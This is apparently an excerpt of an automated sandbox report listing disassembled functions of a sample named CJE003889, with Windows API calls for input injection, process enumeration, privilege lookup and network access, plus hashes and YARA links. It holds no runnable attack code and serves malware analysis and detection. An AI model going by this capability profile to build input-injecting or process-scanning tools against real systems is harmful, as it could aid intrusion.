Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 664784eb8ff79be50936ff27c648f46c72ebd4d0db90ff687392d0a0c6410f78
Instruction ID: 3516410f23d72b7b8d603545d3dc483a5b27b3ecfde350154cae891a69af0fb0
Opcode Fuzzy Hash: 664784eb8ff79be50936ff27c648f46c72ebd4d0db90ff687392d0a0c6410f78
Instruction Fuzzy Hash: 79410939600650DFCB21EF55C485A5DBBE5EF8A310F198098ED5AAB3A2CB30FD01DB91

Function 00CE8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CE88DE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 68607668a28d55c5b58d94ad376503ab10de1ea1baedb7b6c33b850878b78fee
Instruction ID: a0d255fadc24487b7afe9496260e1eb5cfcae839430d575ce6c162e23e42a452
Opcode Fuzzy Hash: 68607668a28d55c5b58d94ad376503ab10de1ea1baedb7b6c33b850878b78fee
Instruction Fuzzy Hash: E831E834A40288AFEF309B56DC85FBD77A5EB05310F944111FA29E62E2CE71DA489752

Function 00CEAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00CEAB60
GetWindowRect.USER32(?,?), ref: 00CEABD6
PtInRect.USER32(?,?,00CEC014), ref: 00CEABE6
MessageBeep.USER32(00000000), ref: 00CEAC57

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: d9e3e44aaa2c713b53f29ada55c845cbdd8ffe937324ac90849de1c1ca6e84ad
Instruction ID: 48d7843379b642de69413cd987827d7ecd59c8bafbe702470ed406c780d7783a
Opcode Fuzzy Hash: d9e3e44aaa2c713b53f29ada55c845cbdd8ffe937324ac90849de1c1ca6e84ad
Instruction Fuzzy Hash: AF418030600699DFCB21DF5AD884B69BBF5FB49300F2480A9E415DF364D731B942CBA2

Function 00CC0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CC0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00CC0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CC0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CC0BFB

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 527a02f7be54c2a48d6192bce0821a76f8d94d449634a865f2eb02666accb68e
Instruction ID: b99a18fd30b4deabb7901957dade04a5177ac899d90a78f81d8429c0ad0fddd6
Opcode Fuzzy Hash: 527a02f7be54c2a48d6192bce0821a76f8d94d449634a865f2eb02666accb68e
Instruction Fuzzy Hash: C5313730D40608EFFB30CB65CC15FFEBBA9AB45328F28425EE5A5521D1C3748E819761

Function 00CC0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CC0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00CC0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00CC0CE1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CC0D33

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 95ba411ab88ca888eb7b3aac93b7ab9d1f4bd8aa6512592af613c8fd7f4d5554
Instruction ID: f0b5df1e95e8af20a1be916395b24b06b322060febe66bbf1d0b507d3a0d0b91
Opcode Fuzzy Hash: 95ba411ab88ca888eb7b3aac93b7ab9d1f4bd8aa6512592af613c8fd7f4d5554
Instruction Fuzzy Hash: 6F312630940758EEFF308B65CC05FFEBBAAAB45310F24435EE4A5521D1C3399A46D762

Function 00C961C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C961FB
__isleadbyte_l.LIBCMT ref: 00C96229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C96257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00C9628D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 325766faff15a9c16b79ee2920b2cc429c32bd8de64d8a1c9fbecff6b4e4d464
Instruction ID: cf83758be3a42d41279647b527d472c6536103e384f78d040a2e4fb2cdfd2a7c
Opcode Fuzzy Hash: 325766faff15a9c16b79ee2920b2cc429c32bd8de64d8a1c9fbecff6b4e4d464
Instruction Fuzzy Hash: 1431B03160468AAFDF229F75CC48BBE7BA9FF42310F154029E864971E1D731EA51DB90

Function 00CE4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00CE4F02

Part of subcall function 00CC3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CC365B
Part of subcall function 00CC3641: GetCurrentThreadId.KERNEL32 ref: 00CC3662
Part of subcall function 00CC3641: AttachThreadInput.USER32(00000000,?,00CC5005), ref: 00CC3669

GetCaretPos.USER32(?), ref: 00CE4F13
ClientToScreen.USER32(00000000,?), ref: 00CE4F4E
GetForegroundWindow.USER32 ref: 00CE4F54

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d8c42b58df4e2f7f9b8d4c574f4abc512f55ad1b772f1b3584e702e0388f240c
Instruction ID: b7ab5b4ea13c362a3241c0c69a296e3e78f95cdf54e52f86e0595107d79a1a12
Opcode Fuzzy Hash: d8c42b58df4e2f7f9b8d4c574f4abc512f55ad1b772f1b3584e702e0388f240c
Instruction Fuzzy Hash: 7A311CB1D00148AFDB10EFA6C885EEFB7FDEF98300F10406AE415E7241DA759E459BA1

Function 00CC3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CC3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00CC3C88
Process32NextW.KERNEL32(00000000,?), ref: 00CC3CA8
CloseHandle.KERNEL32(00000000), ref: 00CC3D52

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 3a9040ba8118d0f6b27f5c9fc80a4f29a461c79790376d00ec4f6d9f2089a948
Instruction ID: e491c198e6ea7bab0508b4ae66257ebece45dc16058783b11e963f966276fa2a
Opcode Fuzzy Hash: 3a9040ba8118d0f6b27f5c9fc80a4f29a461c79790376d00ec4f6d9f2089a948
Instruction Fuzzy Hash: 6C31BA311083859FD314EF20D8C1FAFBBE8AF95354F50492CF492861A1EB719A4ACB92

Function 00CEC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

GetCursorPos.USER32(?), ref: 00CEC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C9B9AB,?,?,?,?,?), ref: 00CEC4E7
GetCursorPos.USER32(?), ref: 00CEC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C9B9AB,?,?,?), ref: 00CEC56E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 75caac818a84529613529d87d235ac541eb1b95b986d060e63b9d18c26dae286
Instruction ID: e83bc402c7ddf95a94b3bb69c243a956cefe69fea6c04c9e0b5fa63c8a549819
Opcode Fuzzy Hash: 75caac818a84529613529d87d235ac541eb1b95b986d060e63b9d18c26dae286
Instruction Fuzzy Hash: 1431A535501498AFCB25CF99D8D8EFE7BB5EB09310F044069F9158B261C731AE52EFA4

Function 00CB8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CB8121
Part of subcall function 00CB810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CB812B
Part of subcall function 00CB810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB813A
Part of subcall function 00CB810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8141
Part of subcall function 00CB810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CB8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CB86A3
_memcmp.LIBCMT ref: 00CB86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CB86FC
HeapFree.KERNEL32(00000000), ref: 00CB8703

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3d0697c902e7e3276bcfaa67b1521222d4d0f8daf35a1ab74b243a8f6511b4c3
Instruction ID: a5210c226aec89a74054a6597c0368143d2965334c13d992463ef0c42faf5855
Opcode Fuzzy Hash: 3d0697c902e7e3276bcfaa67b1521222d4d0f8daf35a1ab74b243a8f6511b4c3
Instruction Fuzzy Hash: 5E218C71E01208EFDF10DFA8C949BEEB7B8EF45304F158059E854AB240DB30AE0ADB90

Function 00C8098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00C809AE

Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50

_fprintf.LIBCMT ref: 00C809E5
OutputDebugStringW.KERNEL32(?), ref: 00CB5DBB

Part of subcall function 00C84AAA: _flsall.LIBCMT ref: 00C84AC3

__setmode.LIBCMT ref: 00C80A1A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 6f766a96906d88b0802b941e382d8dbf8fb49b055f7a89cbadf96bbdc39fa3df
Instruction ID: c7ca784bbd7f617cb03c61faa432483316de06828a981ae640a91a11474d035e
Opcode Fuzzy Hash: 6f766a96906d88b0802b941e382d8dbf8fb49b055f7a89cbadf96bbdc39fa3df
Instruction Fuzzy Hash: 02113671904245AFDB18B3B49C86EFE77A8DF45324F340159F205971C3EE305946B7A9

Function 00CD1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CD17A3

Part of subcall function 00CD182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CD184C
Part of subcall function 00CD182D: InternetCloseHandle.WININET(00000000), ref: 00CD18E9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 81989420bdd391e853fae4199a22033c4db9058649408eee9b9f0529d470a45f
Instruction ID: d4827b15c2ed40c1586e23e7ae3e04d65ba637cc5907c6fd2ee1b7b1a61a6660
Opcode Fuzzy Hash: 81989420bdd391e853fae4199a22033c4db9058649408eee9b9f0529d470a45f
Instruction Fuzzy Hash: 14218E72200605BFEB129F609C41BBBBBA9FB88710F19402BFE1196791DB719911A7A0

Function 00CC3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00CEFAC0), ref: 00CC3A64
GetLastError.KERNEL32 ref: 00CC3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00CC3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CEFAC0), ref: 00CC3ADF

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: d4767bfb64bd3d4033b06ac21c449279eeb4e0b66885347ecd4e50cbadbc9151
Instruction ID: faaecd8e8ae2aada03af60e07c5d69f357b160bb07cffc9ae7e26b6497c6b0b6
Opcode Fuzzy Hash: d4767bfb64bd3d4033b06ac21c449279eeb4e0b66885347ecd4e50cbadbc9151
Instruction Fuzzy Hash: AA21D3705082419F8310EF68D881E6A77E4AE59364F108A2DF4E9CB2A1DB31DE16DB92

Function 00CBDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?), ref: 00CBF0CB
Part of subcall function 00CBF0BC: lstrcpyW.KERNEL32(00000000,?,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBF0F1
Part of subcall function 00CBF0BC: lstrcmpiW.KERNEL32(00000000,?,00CBDCD3,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?), ref: 00CBF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDCEC
lstrcpyW.KERNEL32(00000000,?,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00CBEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00CBDD46

Strings

cdecl, xrefs: 00CBDD3D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 551f2f876fea6a327a31918eecf0b62b26191a0bfcbe505f0dd1ff4eb1325fb0
Instruction ID: 19e0b7680be9b2232fc9c750f3a289936fb0f5406469dbc5b780bb7a93cdaaae
Opcode Fuzzy Hash: 551f2f876fea6a327a31918eecf0b62b26191a0bfcbe505f0dd1ff4eb1325fb0
Instruction Fuzzy Hash: 5411BB3A200305EBCB25AF74DC45ABE77A8FF45310F40802AF856CB2A0FB719941D7A4

Function 00C950E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C95101

Part of subcall function 00C8571C: __FF_MSGBANNER.LIBCMT ref: 00C85733
Part of subcall function 00C8571C: __NMSG_WRITE.LIBCMT ref: 00C8573A
Part of subcall function 00C8571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001,00000000,?,?,?,00C80DD3,?), ref: 00C8575F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 73fddb7de2c4e47d310322a2dc9bdbc76d0b41ed3de5fa74ee048134996bdde2
Instruction ID: cf4a5ce3eebd4ec6c74a0622c9daf19fb5b95b0a28f20ab8533031bbe8dc2e9b
Opcode Fuzzy Hash: 73fddb7de2c4e47d310322a2dc9bdbc76d0b41ed3de5fa74ee048134996bdde2
Instruction Fuzzy Hash: D4112972500A11AFCF333F70AC4D76D3B989F50365B10452EF9549A260DF30CE42A798

Function 00CD6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CC7896,?,?,00000000), ref: 00C65A2C
Part of subcall function 00C65A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CC7896,?,?,00000000,?,?), ref: 00C65A50

gethostbyname.WSOCK32(?,?,?), ref: 00CD6399
WSAGetLastError.WSOCK32(00000000), ref: 00CD63A4
_memmove.LIBCMT ref: 00CD63D1
inet_ntoa.WSOCK32(?), ref: 00CD63DC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: d1a00e77792aeb74ab15cc80ee933342cff68780fc8a7057f71ae8fc4886f57a
Instruction ID: ef59175df2694b7a051987e8bd32e881b708585f81b8b8d8b75ef6e269101076
Opcode Fuzzy Hash: d1a00e77792aeb74ab15cc80ee933342cff68780fc8a7057f71ae8fc4886f57a
Instruction Fuzzy Hash: 32116032500109AFCB10FBE4DD86DEEB7B8EF09310B144169F605A72A2DB31AE15EB61

Function 00CB8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00CB8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CB8BA4

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5de41a997f1e36b761729fb3c206eb54879ea62fd84a992a050927a3fe06d61b
Instruction ID: 7ce157fecfc4001ddd9a1104699c5bf02ed1cc6f5302bedefaeb15a9938f0b27
